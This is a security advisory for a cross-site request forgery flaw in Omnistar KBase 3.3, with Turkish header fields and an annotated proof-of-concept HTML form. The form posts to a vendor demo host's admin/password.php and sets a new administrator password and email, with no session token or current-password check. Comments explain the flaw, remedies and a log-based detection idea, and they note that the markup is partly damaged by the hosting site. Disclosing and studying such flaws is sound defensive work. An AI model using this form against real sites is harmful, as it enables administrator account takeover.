< ------------------- header data start ------------------- >
#############################################################
# Application Name :Omnistar KBase
# Version : 3.3
# Vulnerability Type : XSRF (cross-site request forgery, CSRF)
# Infection : Uzaktan otomatik olarak admin bilgileri değiştirilebilir. (Impact: the administrator's account details can be changed remotely and automatically.)
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski şifre sorulmalıdır. (Fix: add a session token to the form and require the old password.)
# author : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Advisory listing: a copy of the product's "Administrative password" form
  whose action is an absolute URL to admin/password.php, sent with method=post.

  What the listing shows: the request body consists only of f_password,
  f_password2, f_email, f_notify and check=update. No per-session anti-CSRF
  token field and no current-password field appear in the form, which is the
  weakness the advisory header names (XSRF). Whether the server performs any
  other origin check is not visible from this page.

  Remediation, as stated in the advisory header: add a session token to the
  form (and verify it server-side on every state-changing request) and require
  the old password before accepting a new one. Common complementary controls
  are the SameSite cookie attribute on the admin session cookie and
  Origin/Referer validation on POSTs to the admin area.

  Detection idea: review web logs for POST requests to admin/password.php
  whose Origin or Referer header is not the application's own host.

  NOTE(review): the markup below was damaged by the hosting site. Quotes were
  turned into typographic apostrophes, the e-mail value appears to have been
  masked by an e-mail protection filter, and one attribute of the image input
  appears to have been replaced by a word filter ("Yasak Kelime" is Turkish
  for "forbidden word"). It is reproduced as found.
-->
<form action=http://www.mywebetools.com/demo_kb1/admin/password.php method=post><table width=722 border=1 cellpadding=0 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’>
<tr valign=top>
<td height=21 align=center valign=middle nowrap background=../images/title_bg.jpg class=Arial12Grey><div align=left><b>Administrative password</b></div></td>
</tr>
</table>
<!-- Layout spacer only; carries no form data. -->
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr>
<td><img src=../images/spacer.gif width=1 height=1></td>
</tr>
</table>
<!-- Submitted fields start here: new password and its confirmation. There is no field for the current password. -->
<table width=722 border=1 cellpadding=5 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’><tr bgcolor=#f4f4f4><td class=Arial11Grey> New password: </td><td class=Arial11Blue><input type=password name=’f_password’ value= ></td></tr>
<tr bgcolor=#f4f4f4><td class=Arial11Grey> Confirm password: </td><td class=Arial11Blue><input type=password name=’f_password2’ value= ></td></tr>
<!-- The admin contact e-mail is part of the same request, so it changes together with the password. -->
<tr bgcolor=#f4f4f4><td class=Arial11Grey> Email: </td><td class=Arial11Blue><input type=text name=’f_email’ value=[email protected] ></td></tr>
<tr bgcolor=#f4f4f4><td class=Arial11Grey> Send notification of expired articles: </td><td class=Arial11Blue><input type=checkbox name=’f_notify’ value=’1’ checked ></td></tr>
<!-- Image submit control; its attribute text is garbled in the source (see the note at the top). -->
<tr bgcolor=f4f4f4><td colspan=2 class=Arial11Grey align=left><input type=image name=check Yasak Kelime#146;../images/update.jpg’ border=0>
<!-- Hidden check=update field; presumably the action selector read by password.php (not confirmed by this page). It is a fixed value, not a per-session token. -->
<input type=hidden name=check value=’update’></td></tr>
</table></form>
< -- bug code end of -- >